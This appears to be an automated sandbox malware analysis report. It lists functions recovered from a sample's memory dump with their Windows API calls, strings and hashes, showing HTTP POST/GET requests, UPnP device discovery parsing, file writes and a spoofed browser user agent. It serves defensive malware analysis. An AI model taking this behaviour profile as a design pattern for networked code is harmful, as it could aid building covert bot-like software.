EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

ilci, xrefs: 004019E1
PCOI, xrefs: 0040198A

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040EF98
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
InternetCloseHandle.WININET(00000000), ref: 0040F181
InternetCloseHandle.WININET(00000000), ref: 0040F18E
InternetCloseHandle.WININET(00000000), ref: 0040F19B

Strings

Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040EFF6
<, xrefs: 0040EFA0
POST, xrefs: 0040F05E

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

ilci, xrefs: 00401630
PCOI, xrefs: 0040160D

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci
API String ID: 2403999931-3762367603
Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 004058D8
GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
Sleep.KERNEL32(00000001), ref: 00405904
GetTickCount.KERNEL32 ref: 0040590A
GetTickCount.KERNEL32 ref: 00405913
wsprintfW.USER32 ref: 00405926
RegisterClassExW.USER32(00000030), ref: 00405933
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
TranslateMessage.USER32(?), ref: 00405985
DispatchMessageA.USER32(?), ref: 0040598F
ExitThread.KERNEL32 ref: 004059A1

Strings

%x%X, xrefs: 0040591A
0, xrefs: 004058E0

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040E668
InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
InternetCloseHandle.WININET(00000000), ref: 0040E837
InternetCloseHandle.WININET(00000000), ref: 0040E844
InternetCloseHandle.WININET(00000000), ref: 0040E851

Strings

GET, xrefs: 0040E72B
<, xrefs: 0040E670

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54

Function 0040F240 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
memcmp.NTDLL ref: 0040F35D
UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
CloseHandle.KERNEL32(00000000), ref: 0040F38A
CloseHandle.KERNEL32(000000FF), ref: 0040F394
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
CloseHandle.KERNEL32(000000FF), ref: 0040F3E2

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID:
API String ID: 3902698870-0
Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98

Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0040DD56
GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
GetCurrentThread.KERNEL32 ref: 0040DD68
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
Sleep.KERNEL32(00000001), ref: 0040DE5E
GetCurrentThread.KERNEL32 ref: 0040DE6D
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96

Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Sleep.KERNEL32(000003E8), ref: 0040E36E
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

LOCATION: , xrefs: 0040E395
HTTP/1.1 200 OK, xrefs: 0040E37F

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D

Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
InternetCloseHandle.WININET(00000000), ref: 0040F538
InternetCloseHandle.WININET(00000000), ref: 0040F542
Sleep.KERNEL32(000003E8), ref: 0040F54D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 2743515581-2960703779
Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55

Function 0040BC70 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(004196B0,?,?,?,?,?,?,00408403), ref: 0040BC7B
CreateFileW.KERNEL32(00419498,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
CloseHandle.KERNEL32(00000000), ref: 0040BD92
CloseHandle.KERNEL32(000000FF), ref: 0040BD9C

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID:
API String ID: 439099756-0
Opcode ID: af503d1c67737f5e7a4c6b5cd89f91135551b442a9aa73af366ecfbccff78a7f
Instruction ID: 6ce507e2cd9b2b22e0d8f2adc06a4f90ab56639610bd8fa176849f2ed8aa1df2
Opcode Fuzzy Hash: af503d1c67737f5e7a4c6b5cd89f91135551b442a9aa73af366ecfbccff78a7f
Instruction Fuzzy Hash: 42415A74E40309EBEB10DFA4CC4ABAEB770EB44704F20856AF6017A2C1C7B96941CB9C

Function 00405C00 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00418C40,?,?,?,?,?,004083CD), ref: 00405C0B
CreateFileW.KERNEL32(00419080,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
CloseHandle.KERNEL32(00000000), ref: 00405D15
CloseHandle.KERNEL32(000000FF), ref: 00405D1F

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID:
API String ID: 3956458805-0
Opcode ID: c9cfc5bb8e9f299d74117b83c35b43e107193d6128e22e980143c9e68f6e6422
Instruction ID: 4997d514b46f4119e51695caf1627ae2f876fdd1ccb9880836c2519cecb6e3e9
Opcode Fuzzy Hash: c9cfc5bb8e9f299d74117b83c35b43e107193d6128e22e980143c9e68f6e6422
Instruction Fuzzy Hash: CD310F74E40209EBDB14DBA4DC4AFAFB774EB48700F20856AE6017B2C0D7B96941CF99

Function 004060A0 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00418C40,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
memcpy.NTDLL(?,00000000,00000100), ref: 00406141
CreateFileW.KERNEL32(00419080,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
CloseHandle.KERNEL32(000000FF), ref: 004062DD
LeaveCriticalSection.KERNEL32(00418C40,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID:
API String ID: 1457358591-0
Opcode ID: 5f0c35ace356c611a9e8f5354151cb8d782a5484ce114d08bf1449ba547e6608
Instruction ID: ab35c575bba7e7f5c7f9e4113b243896ca629c02e9b3b4dccd483637f3618332
Opcode Fuzzy Hash: 5f0c35ace356c611a9e8f5354151cb8d782a5484ce114d08bf1449ba547e6608
Instruction Fuzzy Hash: A971AEB5E002099BCB04DF94D885FEFB7B1BB48304F14816DE506BB381D779A991CBA9

Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

device, xrefs: 0040ED73
deviceType, xrefs: 0040ED86

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95

Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

serviceType, xrefs: 0040EC26
service, xrefs: 0040EC13

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
